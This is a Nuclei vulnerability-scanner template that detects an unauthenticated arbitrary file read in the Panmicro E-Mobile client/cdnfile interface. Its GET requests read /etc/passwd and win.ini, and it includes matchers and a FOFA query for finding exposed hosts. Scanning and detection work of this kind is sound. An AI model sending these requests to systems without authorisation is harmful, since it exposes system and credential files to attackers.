nuclei-templates/http/vulnerabilities/other/panmicro-arbitrary-file-read.yaml

id: panmicro-arbitrary-file-read

info:
  name: Panmicro E-Mobile System - Arbitrary File Read
  author: s4e-io
  severity: high
  description: |
    The Panmicro E-Mobile client/cdnfile interface has an arbitrary file reading vulnerability. Unauthenticated attackers can use this vulnerability to read important system files, database configuration files, and so on.
  reference:
    - http://cn-sec.com/archives/3182931.html
    - https://cn-sec.com/archives/3188605.html
  metadata:
    verified: true
    max-request: 2
    vendor: panmicro
    product: e-mobile-system
    fofa-query: app="泛微-EMobile"
  tags: panmicro,e-mobile,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/client/cdnfile/1C/Windows/win.ini?windows"
      - "{{BaseURL}}/client/cdnfile/C/etc/passwd?linux"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"bit app support","fonts","extensions") || regex("root:.*:0:0:", body)'
          - 'contains_any(header,"application/octet-stream", "text/plain")'
          - 'contains(header," attachment; filename=")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402203d773bf4f7ab61f056c1d560468eb5f8e4f0ec73a849f24cd7a709b4ca7f3917022070f1e1002b678f99aad87bcedc9af7dbfb5cbf62dc9b364460e54943824cb848:922c64590222798bb761d5b6d8e72950